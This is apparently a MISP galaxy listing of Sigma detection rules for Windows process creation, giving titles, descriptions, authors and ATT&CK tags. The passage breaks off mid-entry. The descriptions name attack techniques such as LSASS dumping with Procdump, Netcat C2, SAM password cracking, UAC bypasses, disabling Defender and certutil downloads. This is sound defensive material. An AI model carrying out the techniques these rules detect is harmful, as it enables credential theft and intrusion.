UUID c30fb093-1109-4dc8-88a8-b30d11c95a5d which can be used as unique global reference for Whoami.EXE Execution With Output Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_output.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

Internal MISP references

UUID a0459f02-ac51-4c09-b511-b8c9203fc429 which can be used as unique global reference for Potential Process Execution Proxy Via CL_Invocation.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
creation_date 2020/10/14
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_invocation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft OneNote Child Process

Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.

Internal MISP references

UUID c27515df-97a9-4162-8a60-dc0eeb51b775 which can be used as unique global reference for Suspicious Microsoft OneNote Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
creation_date 2022/10/21
falsepositive ['File located in the AppData folder with trusted signature']
filename proc_creation_win_office_onenote_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1566', 'attack.t1566.001', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Renamed FTP.EXE Execution

Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields

Internal MISP references

UUID 277a4393-446c-449a-b0ed-7fdc7795244c which can be used as unique global reference for Renamed FTP.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_renamed_ftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential LSASS Process Dump Via Procdump

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.

Internal MISP references

UUID 5afee48e-67dd-4e03-a783-f74259dcf998 which can be used as unique global reference for Potential LSASS Process Dump Via Procdump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/10/30
falsepositive ['Unlikely, because no one should dump an lsass process memory', 'Another tool that uses command line flags similar to ProcDump']
filename proc_creation_win_sysinternals_procdump_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.credential_access', 'attack.t1003.001', 'car.2013-05-009']
Related clusters

To see the related clusters, click here.

JSC Convert Javascript To Executable

Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format

Internal MISP references

UUID 52788a70-f1da-40dd-8fbd-73b5865d6568 which can be used as unique global reference for JSC Convert Javascript To Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename proc_creation_win_lolbin_jsc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Potential Homoglyph Attack Using Lookalike Characters

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

Internal MISP references

UUID 32e280f1-8ad4-46ef-9e80-910657611fbc which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/05/07
falsepositive ['Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.']
filename proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

HackTool - Quarks PwDump Execution

Detects usage of the Quarks PwDump tool via commandline arguments

Internal MISP references

UUID 0685b176-c816-4837-8e7b-1216f346636b which can be used as unique global reference for HackTool - Quarks PwDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_quarks_pwdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Execute MSDT Via Answer File

Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)

Internal MISP references

UUID 9c8c7000-3065-44a8-a555-79bcba5d9955 which can be used as unique global reference for Execute MSDT Via Answer File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/13
falsepositive ['Possible undocumented parents of "msdt" other than "pcwrun"']
filename proc_creation_win_lolbin_msdt_answer_file.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']
Related clusters

To see the related clusters, click here.

Findstr Launching .lnk File

Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack

Internal MISP references

UUID 33339be3-148b-4e16-af56-ad16ec6c7e7b which can be used as unique global reference for Findstr Launching .lnk File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick
creation_date 2020/05/01
falsepositive ['Unknown']
filename proc_creation_win_findstr_lnk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1202', 'attack.t1027.003']
Related clusters

To see the related clusters, click here.

Suspicious ScreenSave Change by Reg.exe

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension

Internal MISP references

UUID 0fc35fc3-efe6-4898-8a37-0b233339524f which can be used as unique global reference for Suspicious ScreenSave Change by Reg.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/19
falsepositive ['GPO']
filename proc_creation_win_reg_screensaver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded FromBase64String Cmdlet

Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line

Internal MISP references

UUID fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c which can be used as unique global reference for PowerShell Base64 Encoded FromBase64String Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/08/24
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_frombase64string.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Parameter Substring

Detects suspicious PowerShell invocation with a parameter substring

Internal MISP references

UUID 36210e0d-5b19-485d-a087-c096088885f0 which can be used as unique global reference for Suspicious PowerShell Parameter Substring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_susp_parameter_variation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Boot Configuration Tampering Via Bcdedit.EXE

Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.

Internal MISP references

UUID 1444443e-6757-43e4-9ea4-c8fc705f79a2 which can be used as unique global reference for Boot Configuration Tampering Via Bcdedit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_bcdedit_boot_conf_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Code Execution via Pcwutl.dll

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

Internal MISP references

UUID 9386d78a-7207-4048-9c9f-a93a7c2d1c05 which can be used as unique global reference for Code Execution via Pcwutl.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/05
falsepositive ['Use of Program Compatibility Troubleshooter Helper']
filename proc_creation_win_lolbin_pcwutl.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Import PowerShell Modules From Suspicious Directories - ProcCreation

Detects powershell scripts that import modules from suspicious directories

Internal MISP references

UUID c31364f7-8be6-4b77-8483-dd2b5a7b69a3 which can be used as unique global reference for Import PowerShell Modules From Suspicious Directories - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/10
falsepositive ['Unknown']
filename proc_creation_win_powershell_import_module_susp_dirs.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Spool Service Child Process

Detects suspicious print spool service (spoolsv.exe) child processes.

Internal MISP references

UUID dcdbc940-0bff-46b2-95f3-2d73f848e33b which can be used as unique global reference for Suspicious Spool Service Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
creation_date 2021/07/11
falsepositive ['Unknown']
filename proc_creation_win_spoolsv_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1203', 'attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec PowerShell Obfuscation

The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

Internal MISP references

UUID 6f8b3439-a203-45dc-a88b-abf57ea15ccf which can be used as unique global reference for HackTool - CrackMapExec PowerShell Obfuscation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2020/05/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027.005']
Related clusters

To see the related clusters, click here.

HackTool - Sliver C2 Implant Activity Pattern

Detects process activity patterns as seen being used by Sliver C2 framework implants

Internal MISP references

UUID 42333b2c-b425-441c-b70e-99404a17170f which can be used as unique global reference for HackTool - Sliver C2 Implant Activity Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sliver_c2_execution_pattern.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Use of VisualUiaVerifyNative.exe

VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.

Internal MISP references

UUID b30a8bc5-e21b-4ca2-9420-0a94019ac56a which can be used as unique global reference for Use of VisualUiaVerifyNative.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/01
falsepositive ['Legitimate testing of Microsoft UI parts.']
filename proc_creation_win_lolbin_visualuiaverifynative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Firewall Configuration Discovery Via Netsh.EXE

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID 0e4164da-94bc-450d-a7be-a4b176179f1f which can be used as unique global reference for Firewall Configuration Discovery Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/12/07
falsepositive ['Administrative activity']
filename proc_creation_win_netsh_fw_rules_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Hacktool Execution - PE Metadata

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

Internal MISP references

UUID 37c1333a-a0db-48be-b64b-7393b2386e3b which can be used as unique global reference for Hacktool Execution - PE Metadata in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/27
falsepositive ['Unlikely']
filename proc_creation_win_hktl_execution_via_pe_metadata.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1588.002', 'attack.t1003']
Related clusters

To see the related clusters, click here.

HackTool - Impacket Tools Execution

Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)

Internal MISP references

UUID 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 which can be used as unique global reference for HackTool - Impacket Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/24
falsepositive ['Legitimate use of the impacket tools']
filename proc_creation_win_hktl_impacket_tools.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Rundll32 Spawned Via Explorer.EXE

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

Internal MISP references

UUID 1723e720-616d-4ddc-ab02-f7e3685a4713 which can be used as unique global reference for Rundll32 Spawned Via Explorer.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_ROM_
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_rundll32_parent_explorer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Scheduled Task Executing Payload from Registry

Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.

Internal MISP references

UUID 86588b36-c6d3-465f-9cee-8f9093e07798 which can be used as unique global reference for Scheduled Task Executing Payload from Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename proc_creation_win_schtasks_reg_loader.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.

Internal MISP references

UUID ba4cfc11-d0fa-4d94-bf20-7c332c412e76 which can be used as unique global reference for Potentially Suspicious DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_register_dll_regsvr_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Suspicious Remote Child Process From Outlook

Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).

Internal MISP references

UUID e212d415-0e93-435f-9e1a-f29005bb4723 which can be used as unique global reference for Suspicious Remote Child Process From Outlook in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/12/27
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_susp_child_processes_remote.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Uncommon Svchost Parent Process

Detects an uncommon svchost parent process

Internal MISP references

UUID 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d which can be used as unique global reference for Uncommon Svchost Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/15
falsepositive ['Unknown']
filename proc_creation_win_svchost_uncommon_parent_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Suspicious WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397

Internal MISP references

UUID 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 which can be used as unique global reference for Suspicious WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/03/16
falsepositive ['Unknown']
filename proc_creation_win_rundll32_webdav_client_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003', 'cve.2023.23397']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of VsCode

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

Internal MISP references

UUID 5a3164f2-b373-4152-93cf-090b13c12d27 which can be used as unique global reference for Potentially Suspicious Child Process Of VsCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/26
falsepositive ['In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly']
filename proc_creation_win_vscode_child_processes_anomalies.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

User Added to Local Administrators Group

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID ad720b90-25ad-43ff-9b5e-5c841facc8e5 which can be used as unique global reference for User Added to Local Administrators Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Administrative activity']
filename proc_creation_win_susp_add_user_local_admin_group.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Script Event Consumer Spawning Process

Detects a suspicious child process of Script Event Consumer (scrcons.exe).

Internal MISP references

UUID f6d1dd2f-b8ce-40ca-bc23-062efb686b34 which can be used as unique global reference for Script Event Consumer Spawning Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/21
falsepositive ['Unknown']
filename proc_creation_win_scrcons_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

HackTool - Hashcat Password Cracker Execution

Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against

Internal MISP references

UUID 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf which can be used as unique global reference for HackTool - Hashcat Password Cracker Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/27
falsepositive ['Tools that use similar command line flags and values']
filename proc_creation_win_hktl_hashcat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.002']
Related clusters

To see the related clusters, click here.

Bypass UAC via CMSTP

Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files

Internal MISP references

UUID e66779cc-383e-4224-a3a4-267eeb585c40 which can be used as unique global reference for Bypass UAC via CMSTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of cmstp.exe utility by legitimate user']
filename proc_creation_win_uac_bypass_cmstp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002', 'attack.t1218.003']
Related clusters

To see the related clusters, click here.

Capture Credentials with Rpcping.exe

Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

Internal MISP references

UUID 93671f99-04eb-4ab4-a161-70d446a84003 which can be used as unique global reference for Capture Credentials with Rpcping.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/09
falsepositive ['Unlikely']
filename proc_creation_win_rpcping_credential_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

New Process Created Via Taskmgr.EXE

Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC

Internal MISP references

UUID 3d7679bd-0c00-440c-97b0-3f204273e6c7 which can be used as unique global reference for New Process Created Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/13
falsepositive ['Administrative activity']
filename proc_creation_win_taskmgr_susp_child_process.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PUA - Advanced Port Scanner Execution

Detects the use of Advanced Port Scanner.

Internal MISP references

UUID 54773c5f-f1cc-4703-9126-2f797d96a69d which can be used as unique global reference for PUA - Advanced Port Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Legitimate administrative use', 'Tools with similar commandline (very rare)']
filename proc_creation_win_pua_advanced_port_scanner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046', 'attack.t1135']
Related clusters

To see the related clusters, click here.

File Download From IP URL Via Curl.EXE

Detects file downloads directly from IP address URL using curl.exe

Internal MISP references

UUID 9cc85849-3b02-4cb5-b371-3a1ff54f2218 which can be used as unique global reference for File Download From IP URL Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/18
falsepositive ['Unknown']
filename proc_creation_win_curl_download_direct_ip_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Disable Windows Defender AV Security Monitoring

Detects attackers attempting to disable Windows Defender using Powershell

Internal MISP references

UUID a7ee1722-c3c5-aeff-3212-c777e4733217 which can be used as unique global reference for Disable Windows Defender AV Security Monitoring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author ok @securonix invrep-de, oscd.community, frack113
creation_date 2020/10/12
falsepositive ['Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.']
filename proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PUA - DefenderCheck Execution

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.

Internal MISP references

UUID f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 which can be used as unique global reference for PUA - DefenderCheck Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unlikely']
filename proc_creation_win_pua_defendercheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.005']
Related clusters

To see the related clusters, click here.

HackTool - SharpView Execution

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID b2317cfa-4a47-4ead-b3ff-297438c0bc2d which can be used as unique global reference for HackTool - SharpView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpview.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1049', 'attack.t1069.002', 'attack.t1482', 'attack.t1135', 'attack.t1033']
Related clusters

To see the related clusters, click here.

UAC Bypass WSReset

Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config

Internal MISP references

UUID 89a9a0e0-f61a-42e5-8957-b1479565a658 which can be used as unique global reference for UAC Bypass WSReset in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_wsreset_integrity_level.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

DeviceCredentialDeployment Execution

Detects the execution of DeviceCredentialDeployment to hide a process from view

Internal MISP references

UUID b8b1b304-a60f-4999-9a6e-c547bde03ffd which can be used as unique global reference for DeviceCredentialDeployment Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_device_credential_deployment.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

WMIC Remote Command Execution

Detects the execution of WMIC to query information on a remote system

Internal MISP references

UUID 7773b877-5abb-4a3e-b9c9-fd0369b59b00 which can be used as unique global reference for WMIC Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_remote_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded WMI Classes

Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc.

Internal MISP references

UUID 1816994b-42e1-4fb1-afd2-134d88184f71 which can be used as unique global reference for PowerShell Base64 Encoded WMI Classes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/30
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_wmi_classes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Microsoft Workflow Compiler Execution

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

Internal MISP references

UUID 419dbf2b-8a9b-4bea-bf99-7544b050ec8d which can be used as unique global reference for Microsoft Workflow Compiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman, frack113
creation_date 2019/01/16
falsepositive ['Legitimate MWC use (unlikely in modern enterprise environments)']
filename proc_creation_win_lolbin_workflow_compiler.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1127', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Netcat Suspicious Execution

Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

Internal MISP references

UUID e31033fc-33f0-4020-9a16-faf9b31cbf08 which can be used as unique global reference for PUA - Netcat Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2021/07/21
falsepositive ['Legitimate ncat use']
filename proc_creation_win_pua_netcat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1095']
Related clusters

To see the related clusters, click here.

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

Internal MISP references

UUID 19b08b1c-861d-4e75-a1ef-ea0c1baf202b which can be used as unique global reference for Suspicious Download Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
